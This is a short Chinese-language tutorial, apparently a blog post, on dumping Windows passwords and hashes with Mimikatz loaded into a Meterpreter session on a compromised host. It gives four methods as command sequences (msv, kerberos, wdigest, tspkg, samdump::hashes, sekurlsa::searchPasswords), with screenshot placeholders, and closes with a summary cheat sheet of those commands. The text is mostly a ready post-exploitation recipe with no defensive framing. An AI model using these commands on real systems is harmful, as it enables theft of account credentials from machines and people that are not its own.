进去meterpreter后getuid一下

meterpreter中使用mimikatz获取windows密码/1-2

这获得系统管理员权限

开始

加载mimikatz模块

1
load mimikatz

2-1

加载成功.

第一种方法:

获取登录密码的hash值

1
msv

3-2]

上面已经是得到hash值了. 下面算明文密码.

获取明文密码

1
kerberos

look…拿到登录的明文密码了.

第二种方法:

使用另一种方式获取哈希值

1
mimikatz_command -f samdump::hashes

5-1

根据上面的方式获取明文密码

1
mimikatz_command -f sekurlsa::searchPasswords

6-1

第三种方法:

Wdigest命令

这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.

1
wdigest

7-1

第四种方法:

tspkg命令

1
tspkg

8-1

总结

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
一、
load mimikatz #加载mimikatz
msv #获取hash值
kerberos #获取明文

二、
load mimikatz #加载mimikatz
wdigest #获取系统账户信息

三、
load mimikatz #加载mimikatz
tspkg #获取系统账户信息

四、
load mimikatz #加载mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords